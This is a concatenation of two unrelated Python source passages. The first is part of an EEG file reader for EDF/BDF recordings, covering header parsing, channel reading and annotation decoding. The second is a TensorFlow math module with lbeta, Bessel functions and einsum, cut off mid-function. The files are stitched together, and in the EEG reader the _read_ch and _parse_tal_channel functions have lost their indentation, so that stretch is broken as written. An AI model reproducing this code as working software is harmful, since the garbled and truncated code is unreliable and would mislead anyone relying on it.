        On the final read, we need to do::
            >>> data[2*buf_len-2:3*buf_len-2-3] = this_data[0:buf_len-3]
        """
        with open(self._filenames[fi], 'rb', buffering=0) as fid:
            # extract data
            fid.seek(data_offset + blockstart * n_chan * data_size)
            n_blk = int(ceil(float(read_size) / buf_len))
            start_offset = start - blockstart
            end_offset = blockstop - stop
            for bi in range(n_blk):
                # Triage start (sidx) and end (eidx) indices for
                # data (d) and read (r)
                if bi == 0:
                    d_sidx = 0
                    r_sidx = start_offset
                else:
                    d_sidx = bi * buf_len - start_offset
                    r_sidx = 0
                if bi == n_blk - 1:
                    d_eidx = data.shape[1]
                    r_eidx = buf_len - end_offset
                else:
                    d_eidx = (bi + 1) * buf_len - start_offset
                    r_eidx = buf_len
                n_buf_samp = r_eidx - r_sidx
                count = 0
                for j, samp in enumerate(n_samps):
                    # bdf data: 24bit data
                    if j not in sel:
                        # unwanted channel: skip its samples in the file
                        fid.seek(samp * data_size, 1)
                        continue
                    if samp == buf_len:
                        # use faster version with skips built in
                        if r_sidx > 0:
                            fid.seek(r_sidx * data_size, 1)
                        ch_data = _read_ch(fid, subtype, n_buf_samp,
                                           data_size)
                        if r_eidx < buf_len:
                            fid.seek((buf_len - r_eidx) * data_size, 1)
                    else:
                        # read in all the data and triage appropriately
                        ch_data = _read_ch(fid, subtype, samp, data_size)
                        if j == tal_channel:
                            # don't resample tal_channel,
                            # pad with zeros instead.
                            n_missing = int(buf_len - samp)
                            ch_data = np.hstack([ch_data, [0] * n_missing])
                            ch_data = ch_data[r_sidx:r_eidx]
                        elif j == stim_channel:
                            if annot and annotmap or \
                                    tal_channel is not None:
                                # don't bother with resampling the stim ch
                                # because it gets overwritten later on.
                                ch_data = np.zeros(n_buf_samp)
                            else:
                                warnings.warn('Interpolating stim channel.'
                                              ' Events may jitter.')
                                oldrange = np.linspace(0, 1, samp + 1, True)
                                newrange = np.linspace(0, 1, buf_len, False)
                                newrange = newrange[r_sidx:r_eidx]
                                ch_data = interp1d(
                                    oldrange, np.append(ch_data, 0),
                                    kind='zero')(newrange)
                        else:
                            # regular channel at a lower rate: resample up
                            # to the common buffer length.
                            ch_data = resample(ch_data, buf_len, samp,
                                               npad=0)[r_sidx:r_eidx]
                    this_data[count, :n_buf_samp] = ch_data
                    count += 1
                data[:, d_sidx:d_eidx] = this_data[:, :n_buf_samp]
        # Convert digital values to physical units (volts).
        data *= gains.T[sel]
        data += offsets[sel]
        # only try to read the stim channel if it's not None and it's
        # actually one of the requested channels
        if stim_channel is not None and (sel == stim_channel).sum() > 0:
            stim_channel_idx = np.where(sel == stim_channel)[0]
            if annot and annotmap:
                # Stim events come from an external annotation file.
                evts = _read_annot(annot, annotmap, sfreq,
                                   self._last_samps[fi])
                data[stim_channel_idx, :] = evts[start:stop]
            elif tal_channel is not None:
                # Stim events come from the embedded EDF+ TAL channel.
                tal_channel_idx = np.where(sel == tal_channel)[0][0]
                evts = _parse_tal_channel(data[tal_channel_idx])
                self._raw_extras[fi]['events'] = evts
                unique_annots = sorted(set([e[2] for e in evts]))
                mapping = dict((a, n + 1) for n, a in
                               enumerate(unique_annots))
                stim = np.zeros(read_size)
                for t_start, t_duration, annotation in evts:
                    evid = mapping[annotation]
                    n_start = int(t_start * sfreq)
                    n_stop = int(t_duration * sfreq) + n_start - 1
                    # make sure events without duration get one sample
                    n_stop = n_stop if n_stop > n_start else n_start + 1
                    if any(stim[n_start:n_stop]):
                        raise NotImplementedError('EDF+ with overlapping '
                                                  'events not supported.')
                    stim[n_start:n_stop] = evid
                data[stim_channel_idx, :] = stim[start:stop]
            else:
                # Allows support for up to 16-bit trigger values (2 ** 16 - 1)
                stim = np.bitwise_and(data[stim_channel_idx].astype(int),
                                      65535)
                data[stim_channel_idx, :] = stim
def _read_ch(fid, subtype, samp, data_size):
"""Helper to read a number of samples for a single channel"""
if subtype in ('24BIT', 'bdf'):
ch_data = np.fromfile(fid, dtype=np.uint8,
count=samp * data_size)
ch_data = ch_data.reshape(-1, 3).astype(np.int32)
ch_data = ((ch_data[:, 0]) +
(ch_data[:, 1] << 8) +
(ch_data[:, 2] << 16))
# 24th bit determines the sign
ch_data[ch_data >= (1 << 23)] -= (1 << 24)
# edf data: 16bit data
else:
ch_data = np.fromfile(fid, dtype='<i2', count=samp)
return ch_data
def _parse_tal_channel(tal_channel_data):
"""Parse time-stamped annotation lists (TALs) in stim_channel
and return list of events.
Parameters
----------
tal_channel_data : ndarray, shape = [n_samples]
channel data in EDF+ TAL format
Returns
-------
events : list
List of events. Each event contains [start, duration, annotation].
References
----------
http://www.edfplus.info/specs/edfplus.html#tal
"""
# convert tal_channel to an ascii string
tals = bytearray()
for s in tal_channel_data:
i = int(s)
tals.extend([i % 256, i // 256])
regex_tal = '([+-]\d+\.?\d*)(\x15(\d+\.?\d*))?(\x14.*?)\x14\x00'
tal_list = re.findall(regex_tal, tals.decode('ascii'))
events = []
for ev in tal_list:
onset = float(ev[0])
duration = float(ev[2]) if ev[2] else 0
for annotation in ev[3].split('\x14')[1:]:
if annotation:
events.append([onset, duration, annotation])
return events
def _get_edf_info(fname, stim_channel, annot, annotmap, eog, misc, preload):
    """Extracts all the information from the EDF+,BDF file.

    Returns the pair ``(info, edf_info)``: ``info`` is an MNE measurement
    info structure, ``edf_info`` is a dict of reader state (sample counts,
    byte offsets, channel roles) consumed by RawEDF._read_segment_file.
    """
    if eog is None:
        eog = []
    if misc is None:
        misc = []
    info = _empty_info()
    info['filename'] = fname
    edf_info = dict()
    edf_info['annot'] = annot
    edf_info['annotmap'] = annotmap
    edf_info['events'] = []
    with open(fname, 'rb') as fid:
        assert(fid.tell() == 0)
        # --- fixed-size EDF/BDF header fields, read strictly in order ---
        fid.seek(8)
        fid.read(80).strip().decode()  # subject id
        fid.read(80).strip().decode()  # recording id
        day, month, year = [int(x) for x in re.findall('(\d+)',
                                                       fid.read(8).decode())]
        hour, minute, sec = [int(x) for x in re.findall('(\d+)',
                                                        fid.read(8).decode())]
        # two-digit year; EDF dates are assumed to be in the 2000s here
        date = datetime.datetime(year + 2000, month, day, hour, minute, sec)
        info['meas_date'] = calendar.timegm(date.utctimetuple())
        edf_info['data_offset'] = header_nbytes = int(fid.read(8).decode())
        subtype = fid.read(44).strip().decode()[:5]
        if len(subtype) > 0:
            edf_info['subtype'] = subtype
        else:
            # no reserved-field subtype: fall back to the file extension
            edf_info['subtype'] = os.path.splitext(fname)[1][1:].lower()
        edf_info['n_records'] = n_records = int(fid.read(8).decode())
        # record length in seconds
        record_length = float(fid.read(8).decode())
        if record_length == 0:
            edf_info['record_length'] = record_length = 1.
            warnings.warn('Header information is incorrect for record '
                          'length. Default record length set to 1.')
        else:
            edf_info['record_length'] = record_length
        info['nchan'] = nchan = int(fid.read(4).decode())
        channels = list(range(info['nchan']))
        # --- per-channel header arrays (one fixed-width field per channel) ---
        ch_names = [fid.read(16).strip().decode() for ch in channels]
        [fid.read(80).strip().decode() for ch in channels]  # transducer
        units = [fid.read(8).strip().decode() for ch in channels]
        for i, unit in enumerate(units):
            # scale microvolt channels to volts; everything else unscaled
            if unit == 'uV':
                units[i] = 1e-6
            else:
                units[i] = 1
        edf_info['units'] = units
        physical_min = np.array([float(fid.read(8).decode())
                                 for ch in channels])
        edf_info['physical_min'] = physical_min
        physical_max = np.array([float(fid.read(8).decode())
                                 for ch in channels])
        digital_min = np.array([float(fid.read(8).decode())
                                for ch in channels])
        edf_info['digital_min'] = digital_min
        digital_max = np.array([float(fid.read(8).decode())
                                for ch in channels])
        # last channel's prefiltering dropped, presumably the annotation
        # channel — NOTE(review): confirm this holds for files without one
        prefiltering = [fid.read(80).strip().decode()
                        for ch in channels][:-1]
        highpass = np.ravel([re.findall('HP:\s+(\w+)', filt)
                             for filt in prefiltering])
        lowpass = np.ravel([re.findall('LP:\s+(\w+)', filt)
                            for filt in prefiltering])
        high_pass_default = 0.
        if highpass.size == 0:
            info['highpass'] = high_pass_default
        elif all(highpass):
            if highpass[0] == 'NaN':
                info['highpass'] = high_pass_default
            elif highpass[0] == 'DC':
                info['highpass'] = 0.
            else:
                info['highpass'] = float(highpass[0])
        else:
            info['highpass'] = float(np.min(highpass))
            warnings.warn('Channels contain different highpass filters. '
                          'Highest filter setting will be stored.')
        if lowpass.size == 0:
            info['lowpass'] = None
        elif all(lowpass):
            if lowpass[0] == 'NaN':
                info['lowpass'] = None
            else:
                info['lowpass'] = float(lowpass[0])
        else:
            info['lowpass'] = float(np.min(lowpass))
            warnings.warn('%s' % ('Channels contain different lowpass '
                                  'filters. Lowest filter setting will be '
                                  'stored.'))
        # number of samples per record
        n_samps = np.array([int(fid.read(8).decode()) for ch in channels])
        edf_info['n_samps'] = n_samps
        fid.read(32 * info['nchan']).decode()  # reserved
        # sanity check: we consumed exactly the advertised header
        assert fid.tell() == header_nbytes
    physical_ranges = physical_max - physical_min
    cals = digital_max - digital_min
    # Some keys to be consistent with FIF measurement info
    info['description'] = None
    info['buffer_size_sec'] = 10.
    if edf_info['subtype'] in ('24BIT', 'bdf'):
        edf_info['data_size'] = 3  # 24-bit (3 byte) integers
    else:
        edf_info['data_size'] = 2  # 16-bit (2 byte) integers
    # Creates a list of dicts of eeg channels for raw.info
    logger.info('Setting channel info structure...')
    info['chs'] = []
    info['ch_names'] = ch_names
    # EDF+ embeds annotations in a channel with this reserved name
    tal_ch_name = 'EDF Annotations'
    if tal_ch_name in ch_names:
        tal_channel = ch_names.index(tal_ch_name)
    else:
        tal_channel = None
    edf_info['tal_channel'] = tal_channel
    if tal_channel is not None and stim_channel is not None and not preload:
        raise RuntimeError('%s' % ('EDF+ Annotations (TAL) channel needs to'
                                   ' be parsed completely on loading.'
                                   ' You must set preload parameter to'
                                   ' True.'))
    if stim_channel == -1:
        # default: last channel acts as the stim channel
        stim_channel = info['nchan'] - 1
    for idx, ch_info in enumerate(zip(ch_names, physical_ranges, cals)):
        ch_name, physical_range, cal = ch_info
        chan_info = {}
        chan_info['cal'] = cal
        chan_info['logno'] = idx + 1
        chan_info['scanno'] = idx + 1
        chan_info['range'] = physical_range
        chan_info['unit_mul'] = 0.
        chan_info['ch_name'] = ch_name
        chan_info['unit'] = FIFF.FIFF_UNIT_V
        chan_info['coord_frame'] = FIFF.FIFFV_COORD_HEAD
        chan_info['coil_type'] = FIFF.FIFFV_COIL_EEG
        chan_info['kind'] = FIFF.FIFFV_EEG_CH
        chan_info['eeg_loc'] = np.zeros(3)
        chan_info['loc'] = np.zeros(12)
        # eog/misc may be given as names, positive or negative indices
        if ch_name in eog or idx in eog or idx - nchan in eog:
            chan_info['coil_type'] = FIFF.FIFFV_COIL_NONE
            chan_info['kind'] = FIFF.FIFFV_EOG_CH
        if ch_name in misc or idx in misc or idx - nchan in misc:
            chan_info['coil_type'] = FIFF.FIFFV_COIL_NONE
            chan_info['kind'] = FIFF.FIFFV_MISC_CH
        check1 = stim_channel == ch_name
        check2 = stim_channel == idx
        check3 = info['nchan'] > 1
        stim_check = np.logical_and(np.logical_or(check1, check2), check3)
        if stim_check:
            # mark as stim channel with unit gain and the MNE standard name
            chan_info['range'] = 1
            chan_info['cal'] = 1
            chan_info['coil_type'] = FIFF.FIFFV_COIL_NONE
            chan_info['unit'] = FIFF.FIFF_UNIT_NONE
            chan_info['kind'] = FIFF.FIFFV_STIM_CH
            chan_info['ch_name'] = 'STI 014'
            info['ch_names'][idx] = chan_info['ch_name']
            units[idx] = 1
            if isinstance(stim_channel, str):
                # resolve a by-name stim channel to its index
                stim_channel = idx
        if tal_channel == idx:
            # annotation channel: raw codes, no physical scaling
            chan_info['range'] = 1
            chan_info['cal'] = 1
            chan_info['coil_type'] = FIFF.FIFFV_COIL_NONE
            chan_info['unit'] = FIFF.FIFF_UNIT_NONE
            chan_info['kind'] = FIFF.FIFFV_MISC_CH
        info['chs'].append(chan_info)
    edf_info['stim_channel'] = stim_channel
    # sfreq defined as the max sampling rate of eeg
    picks = pick_types(info, meg=False, eeg=True)
    if len(picks) == 0:
        edf_info['max_samp'] = max_samp = n_samps.max()
    else:
        edf_info['max_samp'] = max_samp = n_samps[picks].max()
    info['sfreq'] = max_samp / record_length
    edf_info['nsamples'] = int(n_records * max_samp)
    if info['lowpass'] is None:
        # default lowpass: Nyquist frequency
        info['lowpass'] = info['sfreq'] / 2.
    return info, edf_info
def _read_annot(annot, annotmap, sfreq, data_length):
    """Annotation File Reader
    Parameters
    ----------
    annot : str
        Path to annotation file.
    annotmap : str
        Path to annotation map file containing mapping from label to trigger.
    sfreq : float
        Sampling frequency.
    data_length : int
        Length of the data file.
    Returns
    -------
    stim_channel : ndarray
        An array containing stimulus trigger events.
    """
    # Onsets look like "+12.3" or "-12.3". Use a raw string, drop the stray
    # '/' from the sign class (a '/'-prefixed match would crash float()),
    # and escape the dot so it only matches a literal decimal point.
    pat = r'([+-]\d+\.\d+),(\w+)'
    with open(annot) as fid:
        annot = fid.read()
    triggers = re.findall(pat, annot)
    times, values = zip(*triggers)
    times = [float(time) * sfreq for time in times]
    # Map file lines look like "label:trigger".
    pat = r'(\w+):(\d+)'
    with open(annotmap) as fid:
        annotmap = fid.read()
    mappings = re.findall(pat, annotmap)
    maps = dict(mappings)
    triggers = [int(maps[value]) for value in values]
    stim_channel = np.zeros(data_length)
    for time, trigger in zip(times, triggers):
        # Array indices must be integers; float indexing is an error in
        # modern numpy (older versions silently truncated, as int() does).
        stim_channel[int(time)] = trigger
    return stim_channel
def read_raw_edf(input_fname, montage=None, eog=None, misc=None,
                 stim_channel=-1, annot=None, annotmap=None,
                 preload=False, verbose=None):
    """Read an EDF+ or BDF file and return it as a FIF-compatible Raw object.

    Parameters
    ----------
    input_fname : str
        Path to the EDF+,BDF file.
    montage : str | None | instance of Montage
        Path or instance of montage containing electrode positions.
        If None, sensor locations are (0,0,0).
    eog : list or tuple
        Names of channels or list of indices that should be designated
        EOG channels. Values should correspond to the electrodes in the
        edf file. Default is None.
    misc : list or tuple
        Names of channels or list of indices that should be designated
        MISC channels. Values should correspond to the electrodes in the
        edf file. Default is None.
    stim_channel : str | int | None
        The channel name or channel index (starting at 0).
        -1 corresponds to the last channel (default).
        If None, there will be no stim channel added.
    annot : str | None
        Path to annotation file.
        If None, no derived stim channel will be added (for files requiring
        annotation file to interpret stim channel).
    annotmap : str | None
        Path to annotation map file containing mapping from label to trigger.
        Must be specified if annot is not None.
    preload : bool or str (default False)
        Preload data into memory for data manipulation and faster indexing.
        If True, the data will be preloaded into memory (fast, requires
        large amount of memory). If preload is a string, preload is the
        file name of a memory-mapped file which is used to store the data
        on the hard drive (slower, requires less memory).
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    raw : Instance of RawEDF
        A Raw object containing EDF data.

    See Also
    --------
    mne.io.Raw : Documentation of attribute and methods.
    """
    # Thin convenience wrapper: every argument is forwarded unchanged.
    raw = RawEDF(input_fname=input_fname, montage=montage, eog=eog,
                 misc=misc, stim_channel=stim_channel, annot=annot,
                 annotmap=annotmap, preload=preload, verbose=verbose)
    return raw
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Arithmetic Operations that don't fit into math_ops due to dependencies.
To avoid circular dependencies, some math_ops should go here.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util.tf_export import tf_export
# TODO(b/27419586) Change docstring for required dtype of x once int allowed
@tf_export('lbeta')
def lbeta(x, name='lbeta'):
  r"""Computes \\(ln(|Beta(x)|)\\), reducing along the last dimension.
  Given one-dimensional `z = [z_0,...,z_{K-1}]`, we define
  $$Beta(z) = \prod_j Gamma(z_j) / Gamma(\sum_j z_j)$$
  And for `n + 1` dimensional `x` with shape `[N1, ..., Nn, K]`, we define
  $$lbeta(x)[i1, ..., in] = Log(|Beta(x[i1, ..., in, :])|)$$.
  In other words, the last dimension is treated as the `z` vector.
  Note that if `z = [u, v]`, then
  \\(Beta(z) = int_0^1 t^{u-1} (1 - t)^{v-1} dt\\), which defines the
  traditional bivariate beta function.
  If the last dimension is empty, we follow the convention that the sum over
  the empty set is zero, and the product is one.
  Args:
    x: A rank `n + 1` `Tensor`, `n >= 0` with type `float`, or `double`.
    name: A name for the operation (optional).
  Returns:
    The logarithm of \\(|Beta(x)|\\) reducing along the last dimension.
  """
  # In the event that the last dimension has zero entries, we return -inf.
  # This is consistent with a convention that the sum over the empty set is
  # zero, and the product is one.
  # This is standard. See https://en.wikipedia.org/wiki/Empty_set.
  with ops.name_scope(name, values=[x]):
    x = ops.convert_to_tensor(x, name='x')
    # Note reduce_sum([]) = 0.
    # Use `axis` consistently (the second reduce_sum below already did);
    # `reduction_indices` is the deprecated alias of the same parameter.
    log_prod_gamma_x = math_ops.reduce_sum(
        math_ops.lgamma(x), axis=[-1])
    # Note lgamma(0) = infinity, so if x = []
    #  log_gamma_sum_x = lgamma(0) = infinity, and
    #  log_prod_gamma_x = lgamma(1) = 0,
    # so result = -infinity
    sum_x = math_ops.reduce_sum(x, axis=[-1])
    log_gamma_sum_x = math_ops.lgamma(sum_x)
    result = log_prod_gamma_x - log_gamma_sum_x
    return result
@tf_export('math.bessel_i0')
def bessel_i0(x, name='bessel_i0'):
  """Computes the Bessel i0 function of `x` element-wise.
  Modified Bessel function of order 0.
  It is preferable to use the numerically stabler function `i0e(x)` instead.
  Args:
    x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
      `float32`, `float64`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
  @compatibility(scipy)
  Equivalent to scipy.special.i0
  @end_compatibility
  """
  with ops.name_scope(name, [x]):
    # i0(x) == exp(|x|) * i0e(x): undo the exponential scaling applied by
    # the numerically stable i0e kernel.
    magnitude = math_ops.abs(x)
    return math_ops.bessel_i0e(x) * math_ops.exp(magnitude)
@tf_export('math.bessel_i1')
def bessel_i1(x, name='bessel_i1'):
  """Computes the Bessel i1 function of `x` element-wise.
  Modified Bessel function of order 1.
  It is preferable to use the numerically stabler function `i1e(x)` instead.
  Args:
    x: A `Tensor` or `SparseTensor`. Must be one of the following types: `half`,
      `float32`, `float64`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` or `SparseTensor`, respectively. Has the same type as `x`.
  @compatibility(scipy)
  Equivalent to scipy.special.i1
  @end_compatibility
  """
  with ops.name_scope(name, [x]):
    # i1(x) == exp(|x|) * i1e(x): undo the exponential scaling applied by
    # the numerically stable i1e kernel.
    magnitude = math_ops.abs(x)
    return math_ops.bessel_i1e(x) * math_ops.exp(magnitude)
@tf_export('einsum', 'linalg.einsum')
def einsum(equation, *inputs, **kwargs):
  """A generalized contraction between tensors of arbitrary dimension.
  This function returns a tensor whose elements are defined by `equation`,
  which is written in a shorthand form inspired by the Einstein summation
  convention. As an example, consider multiplying two matrices
  A and B to form a matrix C. The elements of C are given by:
  ```
  C[i,k] = sum_j A[i,j] * B[j,k]
  ```
  The corresponding `equation` is:
  ```
  ij,jk->ik
  ```
  In general, the `equation` is obtained from the more familiar element-wise
  equation by
  1. removing variable names, brackets, and commas,
  2. replacing "*" with ",",
  3. dropping summation signs, and
  4. moving the output to the right, and replacing "=" with "->".
  Many common operations can be expressed in this way. For example:
  ```python
  # Matrix multiplication
  >>> einsum('ij,jk->ik', m0, m1)  # output[i,k] = sum_j m0[i,j] * m1[j, k]
  # Dot product
  >>> einsum('i,i->', u, v)  # output = sum_i u[i]*v[i]
  # Outer product
  >>> einsum('i,j->ij', u, v)  # output[i,j] = u[i]*v[j]
  # Transpose
  >>> einsum('ij->ji', m)  # output[j,i] = m[i,j]
  # Batch matrix multiplication
  >>> einsum('aij,ajk->aik', s, t)  # out[a,i,k] = sum_j s[a,i,j] * t[a, j, k]
  ```
  This function behaves like `numpy.einsum`, but does not support:
  * Ellipses (subscripts like `ij...,jk...->ik...`)
  * Subscripts where an axis appears more than once for a single input
    (e.g. `ijj,k->ik`).
  * Subscripts that are summed across multiple inputs (e.g., `ij,ij,jk->ik`).
  Args:
    equation: a `str` describing the contraction, in the same format as
      `numpy.einsum`.
    *inputs: the inputs to contract (each one a `Tensor`), whose shapes should
      be consistent with `equation`.
    name: A name for the operation (optional).
  Returns:
    The contracted `Tensor`, with shape determined by `equation`.
  Raises:
    ValueError: If
      - the format of `equation` is incorrect,
      - the number of inputs implied by `equation` does not match `len(inputs)`,
      - an axis appears in the output subscripts but not in any of the inputs,
      - the number of dimensions of an input differs from the number of
        indices in its subscript, or
      - the input shapes are inconsistent along a particular axis.
  """
  # Whitespace in the equation is insignificant; strip it before parsing.
  equation = equation.replace(" ", "")
  name = kwargs.pop('name', None)
  if kwargs:
    raise TypeError('invalid keyword arguments for this function: ' + ', '.join(
        [format(key) for key in sorted(list(kwargs.keys()))]))
  with ops.name_scope(name, 'einsum', [equation, inputs]) as name:
    if '...' in equation:
      raise ValueError('Subscripts with ellipses are not yet supported.')
    # Grammar: comma-separated input subscripts, then an optional
    # '->' followed by the output subscripts.
    match = re.match('^([a-zA-Z,]+)(->[a-zA-Z]*)?$', equation)
    if not match:
      raise ValueError('Indices have incorrect format: %s' % equation)
    inputs = list(inputs)
    input_axis_labels = match.group(1).split(',')
    if len(inputs) != len(input_axis_labels):
      raise ValueError('Got %d arguments for equation "%s", expecting %d' %
                       (len(inputs), equation, len(input_axis_labels)))
    axis_labels = set(''.join(input_axis_labels))
    if match.group(2):
      output_axis_labels = match.group(2)[2:]
    else:
      # infer the output subscripts if not given, assume alphabetical order:
      # an index that appears in exactly one input survives to the output.
      indices = ''.join(sorted(axis_labels))
      counts = {ax: 0 for ax in indices}
      for axes_ in input_axis_labels:
        for ax in axes_:
          counts[ax] += 1
      output_axis_labels = ''.join(
          sorted(ax for ax in indices if counts[ax] == 1))
    # An index summed over more than two inputs cannot be expressed as a
    # chain of pairwise reductions; fall back to the exponential-space path.
    for a in axis_labels:
      input_count = sum(1 for s in input_axis_labels if a in s)
      if input_count > 2 and a not in output_axis_labels:
        logging.warn(
            'Falling back to exponential-space implementation of einsum()'
            ' because index "%s" is summed over more than two inputs.', a)
        return _exponential_space_einsum(equation, *inputs)
    # Contract the inputs pairwise, left to right.
    temp = inputs[0]
    temp_axis_labels = input_axis_labels[0]
    for i in xrange(len(inputs) - 1):
      # Note: '-' binds tighter than '&', so this computes
      # temp_labels ∩ (next_labels − output_labels).
      axes_to_sum = (
          set(temp_axis_labels) &
          set(input_axis_labels[i + 1]) - set(output_axis_labels))
      temp, temp_axis_labels = _einsum_reduction(
          temp, temp_axis_labels, inputs[i + 1], input_axis_labels[i + 1],
          axes_to_sum)
    # Sum out any axes that survived the pairwise contractions but are
    # absent from the requested output.
    missing_indices = set(temp_axis_labels) - set(output_axis_labels)
    if missing_indices:
      reduction_indices = [
          i for i, a in enumerate(temp_axis_labels)
          if a not in output_axis_labels
      ]
      temp = math_ops.reduce_sum(temp, reduction_indices=reduction_indices)
      temp_axis_labels = ''.join(
          a for a in temp_axis_labels if a in output_axis_labels)
    if sorted(temp_axis_labels) != sorted(output_axis_labels):
      raise ValueError('Invalid equation: %s' % equation)
    # Reorder the surviving axes to match the requested output order.
    perm = [temp_axis_labels.index(a) for a in output_axis_labels]
    return _transpose_if_necessary(temp, perm)
def _einsum_reduction(t0, t0_axis_labels, t1, t1_axis_labels, axes_to_sum):
  """Helper for einsum() that computes the result of a two-argument einsum().
  Args:
    t0: a `Tensor`
    t0_axis_labels: a string of axis labels.  This string's length must equal
      the rank of t0.
    t1: a `Tensor`
    t1_axis_labels: a string to axis labels.  This string's length must equal
      the rank of t1.
    axes_to_sum: set of labels of axes to be summed over
  Returns:
    A `Tensor` whose elements are obtained by summing, over all axes in
    `axes_to_sum`, the corresponding elements of `t0` and `t1`.
    For example, if t0_axis_labels == 'abijk', t1_axis_labels == 'acjkl', and
    axes_to_sum == {j,k}, this will return a tensor x where
      out[a,b,c,i,l] = sum_j sum_k t0[a,b,i,j,k] * t1[a,c,j,k,l]
  Raises:
    ValueError: if the rank of `t0` does not match the length of
      `t0_axis_labels`, or that of `t1` does not match the length of
      `t1_axis_labels`.
  """
  if len(t0_axis_labels) != len(t0.get_shape()):
    raise ValueError(
        'Tensor t0 of rank %d does not match einsum reduction of length %d' %
        (len(t0.get_shape()), len(t0_axis_labels)))
  if len(t1_axis_labels) != len(t1.get_shape()):
    raise ValueError(
        'Tensor t1 of rank %d does not match einsum reduction of length %d' %
        (len(t1.get_shape()), len(t1_axis_labels)))
  # This function computes the result of a two-argument einsum() using batch
  # matrix multiplication.  This involves
  # 1. transposing t0 and t1 so that axes are in the correct order for
  #    batch matrix multiplication, and
  # 2. reshaping t0 and t1 so that they are both of rank 3.
  # First, we divide axes into three groups:
  #  * "preserved" axes are present in both inputs and the output
  #  * "summed" axes are present in both inputs but not the output
  #  * "broadcast" axes are present in exactly one input and the output
  #
  # As an example, if the einsum is abijk,acjkl->abcil, then "a" is a
  # preserved axis, "b" and "c" are broadcast axes, and "j" and "k" are
  # summed axes.
  assert all(a in t0_axis_labels and a in t1_axis_labels for a in axes_to_sum)
  preserved_axes = (set(t0_axis_labels) & set(t1_axis_labels)) - axes_to_sum
  broadcast_axes = {}
  for i, sym_list in enumerate([t0_axis_labels, t1_axis_labels]):
    broadcast_axes[i] = set(sym_list) - preserved_axes - axes_to_sum
  # Reorder the axes so that:
  # 1. preserved axes come first in both inputs
  # 2. in input 0, broadcast axes come next, followed by summed axes
  # 3. in input 1, summed axes come next, followed by broadcast axes
  def sort_key(input_index, a):
    # Tuple keys sort the three groups (-1: preserved, 0: middle group,
    # 1: trailing group), breaking ties alphabetically within each group.
    if a in preserved_axes:
      return (-1, a)
    elif ((input_index == 0 and a in broadcast_axes[0]) or
          (input_index == 1 and a in axes_to_sum)):
      return (0, a)
    else:
      return (1, a)
  axis_labels = [t0_axis_labels, t1_axis_labels]
  sorted_axes = [
      sorted(sym_list, key=lambda a: sort_key(i, a))
      for i, sym_list in enumerate(axis_labels)
  ]
  inputs = [t0, t1]
  for i, axes_str in enumerate(axis_labels):
    perm = [axes_str.find(a) for a in sorted_axes[i]]
    inputs[i] = _transpose_if_necessary(inputs[i], perm)
  t0, t1 = inputs
  if not axes_to_sum:
    # In the special case where there are no axes to sum over, reduce to mul()
    # rather than to batch matrix multiplication.
    for _ in broadcast_axes[1]:
      t0 = array_ops.expand_dims(t0, -1)
    for _ in broadcast_axes[0]:
      t1 = array_ops.expand_dims(t1, len(preserved_axes))
    product = math_ops.multiply(t0, t1)
    product_axes = sorted_axes[0] + sorted_axes[1][len(preserved_axes):]
    return product, ''.join(product_axes)
  else:
    # Reduce to matmul().
    # Reshape both inputs so as to combine multiple broadcast axes
    # into a single axis, and combine multiple summed axes into a
    # single axis.
    t0_shape = _get_shape(t0)
    num_broadcast_elements_t0 = _total_size(
        t0_shape[len(preserved_axes):-len(axes_to_sum)])
    num_summed_elements = _total_size(t0_shape[-len(axes_to_sum):])
    new_shape = (
        t0_shape[:len(preserved_axes)] +
        [num_broadcast_elements_t0, num_summed_elements])
    t0 = _reshape_if_necessary(t0, new_shape)
    t1_shape = _get_shape(t1)
    num_broadcast_elements_t1 = _total_size(
        t1_shape[len(preserved_axes) + len(axes_to_sum):])
    new_shape = (
        t1_shape[:len(preserved_axes)] +
        [num_summed_elements, num_broadcast_elements_t1])
    t1 = _reshape_if_necessary(t1, new_shape)
    # After the reshapes above both operands are rank
    # len(preserved_axes) + 2, so this is a (batched) matrix product over
    # the compacted summed axis.
    product = math_ops.matmul(t0, t1)
    # Undo compaction of broadcast axes
    uncompacted_shape = (
        t0_shape[:len(preserved_axes) + len(broadcast_axes[0])] +
        t1_shape[len(t1_shape) - len(broadcast_axes[1]):])
    product = _reshape_if_necessary(product, uncompacted_shape)
    product_axes = (
        sorted_axes[0][:len(preserved_axes) + len(broadcast_axes[0])] +
        sorted_axes[1][len(sorted_axes[1]) - len(broadcast_axes[1]):])
    return product, ''.join(product_axes)
def _transpose_if_necessary(tensor, perm):
  """Like transpose(), but avoids creating a new tensor if possible.

  Args:
    tensor: a `Tensor`.
    perm: a permutation given as a sequence of axis indices.

  Returns:
    `tensor` itself when `perm` is the identity permutation, otherwise the
    transposed tensor.
  """
  # On Python 3, `perm != range(len(perm))` compared a list to a range
  # object, which is always True, so the identity permutation was never
  # detected and a redundant transpose op was always added. Compare the
  # materialized sequences instead.
  if list(perm) != list(range(len(perm))):
    return array_ops.transpose(tensor, perm=perm)
  else:
    return tensor
def _reshape_if_necessary(tensor, new_shape):
  """Like reshape(), but avoids creating a new tensor if possible."""
  # None is accepted as an alias for -1 in new_shape.
  target = tuple(-1 if dim is None else dim for dim in new_shape)
  current = tuple(dim.value for dim in tensor.get_shape())
  # If the requested shape already matches (treating -1 as a wildcard),
  # reuse the input tensor unchanged.
  same_rank = len(target) == len(current)
  if same_rank and all(c == t or t == -1 for c, t in zip(current, target)):
    return tensor
  return array_ops.reshape(tensor, target)
def _get_shape(tensor):
  """Like get_shape().as_list(), but explicitly queries the shape of a tensor
  if necessary to ensure that the returned value contains no unknown value."""
  static_shape = tensor.get_shape().as_list()
  if all(dim is not None for dim in static_shape):
